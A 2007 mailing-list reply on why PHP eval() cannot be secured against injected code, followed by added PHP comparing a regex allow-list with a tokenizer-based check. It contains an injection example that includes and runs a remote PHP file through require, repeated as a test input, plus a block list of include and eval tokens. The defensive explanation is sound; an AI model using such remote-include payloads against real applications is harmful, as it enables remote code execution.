From: Christian W. <cw...@cw...> - 2007-01-26 05:17:46

Sören,

> Why not extracting all function-calls from the string and comparing with
> an array of allowed functions, e.g.:
>
> preg_match_all('/\s([A-Z0-9_]+)\(/i',$evalstr,$matches);
>
> if(array_diff($matches[1],$allowedFuncs))
>     // denied function call
>
> I admit a bit quick and dirty (maybe "" enclosed strings should also be
> extracted from $evalstr first), but it should work, as I understand the
> problem...

Besides the q&d touch it also doesn't protect you from using language
constructs instead of functions. E.g. require_once is a language construct
and can be called without braces:

> FILTER require "http://some.where/over/the/rainbow.php"

which, together with allow_url_fopen, just cannot be stopped. Now we might
remove another set of hard-coded keywords like require and include from the
string without context, but they also might be valid strings in a search ->

FILTER ?code = "require_once"

Point is, there is no way to secure eval(), that's why everyone warns you
against using it. It isn't even (except under very certain conditions)
allowed in PEAR.

And, eval is very similar to evil - now you know why :)

-- 
Regards/Mit freundlichen Grüßen
Christian Weiske
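As an added example (not code from the thread or from either poster), here is the quoted regex allow-list next to a check built on PHP's token_get_all(), run over constructed inputs. The tokenizer sees require as its own token and a quoted "require_once" as one string literal, so it catches the construct the regex misses without flagging the keyword inside a search string; it still only filters what reaches eval(), so the conclusion above that eval() cannot be made safe stands. Function and variable names are assumptions, and the arrow function needs PHP 7.4+.

```php
<?php
// Added example (not from the thread): the quoted regex allow-list beside a
// tokenizer-based check, run on constructed inputs. Names are assumptions.

$allowedFuncs = ['strtolower', 'trim'];   // constructed allow-list

// The quoted approach: pull "name(" out of the string, compare to the list.
function regexCheck(string $evalstr, array $allowedFuncs): bool
{
    preg_match_all('/\s([A-Z0-9_]+)\(/i', ' ' . $evalstr, $matches);
    return array_diff($matches[1], $allowedFuncs) === [];   // true = allowed
}

// Tokenizer-based check: constructs like require have their own token id,
// and a quoted string is one token, so "require_once" in quotes is ignored.
function tokenCheck(string $evalstr, array $allowedFuncs): bool
{
    $blocked = [T_REQUIRE, T_REQUIRE_ONCE, T_INCLUDE, T_INCLUDE_ONCE, T_EVAL];
    // drop whitespace so a call is simply T_STRING followed by "("
    $tokens = array_values(array_filter(
        token_get_all('<?php ' . $evalstr),
        fn($t) => !(is_array($t) && $t[0] === T_WHITESPACE)
    ));
    foreach ($tokens as $i => $tok) {
        if (!is_array($tok)) {
            continue;                        // single-char tokens: ( ) = ; ...
        }
        if (in_array($tok[0], $blocked, true)) {
            return false;                    // construct, needs no parentheses
        }
        $isCall = $tok[0] === T_STRING && ($tokens[$i + 1] ?? null) === '(';
        if ($isCall && !in_array(strtolower($tok[1]), $allowedFuncs, true)) {
            return false;                    // function call outside the list
        }
    }
    return true;
}

$samples = [                                 // constructed inputs
    'strtolower($q)'                     => 'allowed call',
    'phpinfo()'                          => 'call outside the list',
    'require "http://example.invalid/x"' => 'construct without parentheses',
    '$code = "require_once"'             => 'keyword inside a string literal',
];
foreach ($samples as $code => $label) {
    printf("%-32s regex:%-5s tokens:%s\n", $label,
        regexCheck($code, $allowedFuncs) ? 'allow' : 'deny',
        tokenCheck($code, $allowedFuncs) ? 'allow' : 'deny');
}
```

The regex column allows the bare require line and the tokens column denies it, while both leave the quoted "require_once" alone.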